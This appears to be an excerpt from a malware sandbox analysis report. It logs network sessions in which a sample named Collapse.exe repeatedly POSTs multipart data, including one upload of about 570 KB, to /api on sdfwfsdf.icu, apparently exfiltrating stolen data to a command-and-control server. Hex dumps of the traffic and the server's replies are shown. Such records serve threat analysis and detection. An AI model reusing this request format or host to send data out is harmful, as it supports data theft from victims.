                                          Data Ascii: Mh8oJXEE3QqKTKBH9pMsbEK2r3tqXrjSEBTbTg1IyxohEWklZk6VVMsL/gC01CshEKrpIDxc9fwjNs4FG0WHazNbZnBzHso5u2b+R/yXLhMUu+8tLR/8ggVbhEImVMJKPR8+JXxOlUeIWetQ79hrOAX48G0zH6SCRUiSQhkGnRp5UX1kcwDOFZdN71bv01IcL6roMykdg88ZDckBG0H7ZBNNd3VzTOEAiEfSftuFazJAnuw1KR/8ggVbhEImVMJ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549713188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:24 UTC268OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=QPW26Q0V
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 12784
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:24 UTC12784OUTData Raw: 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61
                                          Data Ascii: --QPW26Q0VContent-Disposition: form-data; name="act"send_message--QPW26Q0VContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--QPW26Q0VContent-Disposition: form-data; name="pid"2--QPW26Q0VContent-Disposition: form-data
                                          2025-03-05 13:57:25 UTC812INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COBho6%2BbyA2h0wY%2BhSGiZ3OQiuZI3BA8SiseVjTZmFIc1hmgrnCewMgImmDYBNZTXcnZQhlBXctFzDp%2Btia49s6jzAilBffIGALHMS5sor7Eh%2BR6AlUq9cDq6LptkiM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f4af92d8095-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2057&rtt_var=830&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2826&recv_bytes=13710&delivery_rate=1273440&cwnd=239&unsent_bytes=0&cid=d834ce17ca6380b8&ts=1060&x=0"
                                          2025-03-05 13:57:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                          2025-03-05 13:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549714188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:25 UTC272OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=H1A60BTFA8F6
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 15050
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:25 UTC15050OUTData Raw: 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                          Data Ascii: --H1A60BTFA8F6Content-Disposition: form-data; name="act"send_message--H1A60BTFA8F6Content-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--H1A60BTFA8F6Content-Disposition: form-data; name="pid"2--H1A60BTFA8F6Content-Dispos
                                          2025-03-05 13:57:27 UTC807INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scrW40PU2jtU5%2BQRoUHfKtbPpdNRcEOclzeMLfJXIRyg8k5zC9z18HMtxNLafD7gEI7Dnz3RIa8qo6dflQxLGQeKiaGae1F3Qu2wtiEt6K5qaSkOanrRxRYRe6AQwtE%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f54ad8d43f7-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1555&rtt_var=591&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2826&recv_bytes=15980&delivery_rate=1838790&cwnd=167&unsent_bytes=0&cid=299046bebd9d6ad0&ts=1786&x=0"
                                          2025-03-05 13:57:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                          2025-03-05 13:57:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549715188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:28 UTC277OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=ABMGTG0TZ38JKITKD
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 20570
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:28 UTC15331OUTData Raw: 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b
                                          Data Ascii: --ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="act"send_message--ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="pid"3--ABMGTG0TZ38JK
                                          2025-03-05 13:57:28 UTC5239OUTData Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                          2025-03-05 13:57:31 UTC813INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3x5XsBMwI0Vtsc1YTT3I2MvXVW4KmIifcwWE6l2C00K1wZAUMuagGQuPd1IyjIqKGrbNcLhg%2BQOeVfDx9OKHDRc6vk0bR%2BUlbLXf6lZsn6fqxU2f8MeODB%2ButXR5kg%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f63693443a6-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1599&rtt_var=611&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2827&recv_bytes=21527&delivery_rate=1773997&cwnd=142&unsent_bytes=0&cid=b33cc1053752526a&ts=3740&x=0"
                                          2025-03-05 13:57:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                          2025-03-05 13:57:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549719188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:32 UTC269OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=QAK4EBFCG4
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 2686
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:32 UTC2686OUTData Raw: 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66
                                          Data Ascii: --QAK4EBFCG4Content-Disposition: form-data; name="act"send_message--QAK4EBFCG4Content-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--QAK4EBFCG4Content-Disposition: form-data; name="pid"1--QAK4EBFCG4Content-Disposition: f
                                          2025-03-05 13:57:33 UTC813INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fIQY%2FVooHlkscX0S%2FaRwPobnk61p%2BdeMOJ0JhOchLIKHCY70ZMPn2Z4pVzGDvatA%2FlI20FkU0PxRK1MpxnAMV6GYnkj%2B7tSjEZ8F1KTt1oM%2BfK6bySRNtbBcpAtKGIk%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f7f1a7bf5f7-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1637&rtt_var=640&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=3591&delivery_rate=1783750&cwnd=162&unsent_bytes=0&cid=dde89cd8aafd155a&ts=448&x=0"
                                          2025-03-05 13:57:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                          2025-03-05 13:57:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549722188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:33 UTC269OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=9ZSKVYPZ
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 570494
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61
                                          Data Ascii: --9ZSKVYPZContent-Disposition: form-data; name="act"send_message--9ZSKVYPZContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--9ZSKVYPZContent-Disposition: form-data; name="pid"1--9ZSKVYPZContent-Disposition: form-data
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f a2 73 7b 7e 50 43 75 fb bc 89 0b 9b 34 d1 73 63 62 07 d4 05 65 c3 bf 7d 03 48 04 9f 1a 28 cd 4a 3a e7 9c 8e cd d5 42 1c 39 f4 e9 02 b0 ec 57 84 c6 1a 58 3b eb 57 5a 6c 86 22 24 c1 31 13 f9 e1 d0 d9 05 e2 52 94 bf 61
                                          Data Ascii: yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x|{C==wZ<rsn)QL_CH::u/Ez;_N5Ns{~PCu4scbe}H(J:B9WX;WZl"$1Ra
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 58 c6 47 bd f9 ae 9a d0 71 bc c4 47 dc 10 3c f8 30 13 f5 5a a9 58 8f 52 b0 b7 c5 60 67 cf 29 a5 b2 a5 c6 4d 2c 1c f4 f4 a7 77 62 5e ed b2 56 88 28 07 7b 87 19 f8 a4 7d 4a be dc 62 7a 54 09 70 bd 7a 3c 55 c4 b8 95 ba
                                          Data Ascii: 9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQXGqG<0ZXR`g)M,wb^V({}JbzTpz<U
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 3f ac 67 3d db f3 5e 0c 58 5e 01 96 98 b2 8f 80 2a b9 ee ee 7a 20 43 0d 14 c6 ff 99 5e 96 46 cc b4 04 6d 46 c9 2c e8 0a b9 2a 7d 1d 22 f6 dc fa e1 3b cb 6e d4 d2 73 fe 74 77 f6 73 c6 aa f2 e9 c8 20 b9 4d 1d 00 5c 34
                                          Data Ascii: :vi+WKx*IMcyNpv!i|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv|wK*-=Xk(r1eU$D(Phr1_sJ5Ata?g=^X^*z C^FmF,*}";nstws M\4
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 8f d8 f9 b9 1f 83 c1 dc 84 6b 0b ea d0 52 58 68 64 64 10 39 dc 6f 53 b3 9f 8f 6a d1 dc 14 54 60 4e 5a 38 43 30 3d 71 2a 22 9d a2 5d c1 51 f5 56 81 ad 95 d3 89 5a 2c 55 70 91 0e 9b 7f 6e 3c ab 83 08 82 3f 7f c9 27 9e
                                          Data Ascii: $_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!kRXhdd9oSjT`NZ8C0=q*"]QVZ,Upn<?'
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 c8 81 3c 85 cd ba 8b ca 80 b0 36 d8 f5 f3 96 21 3b c3 7d dd 72 c8 55 01 44 1d e9 5d d3 83 86 24 d3 49 6c 8a 0b 8c 7c ae 83 83 dd 33 6b 01 9b 2e d8 6c 20 b5 bd f1 20 c3 74 f2 9e ca ec 76 a7 bd 61 2f f3 2e d3 69 f0 ed
                                          Data Ascii: L>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D|gSWK:&pMe[p32D|$2Hpz"SDq#R8YB<6!;}rUD]$Il|3k.l tva/.i
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc 48 cd 19 27 f8 0e c8 0a 06 97 76 23 01 41 b4 39 68 6b 8c 51 07 fc fa c0 7c 67 61 3e 25 b2 49 fa c0 6f ac 1b 5d 23 06 cc 5a 3c f6 c1 36 8f 60 2f c6 06 5f 6e 9b 1c d5 0f 12 d4 07 eb 0a 2d a4 31 03 99 18 1f 2f 95 17 99
                                          Data Ascii: DL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F|kmr,|5bi`.AwHix,?LH'v#A9hkQ|ga>%Io]#Z<6`/_n-1/
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 7d d4 6a 6d 2d d2 66 ce ad f9 4e de 5a 0e 22 13 01 46 16 da 31 9a fe 9e 91 87 35 22 fb 32 86 6c 67 d9 b3 3f 44 d4 69 0f c7 c0 e7 f6 4a 8b 74 9f 38 e2 9e a9 09 a3 e2 1e b9 b5 ac 9d 44 9f e8 50 38 d8 b0 89 e8 03 bb 1a
                                          Data Ascii: ^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H}jm-fNZ"F15"2lg?DiJt8DP8
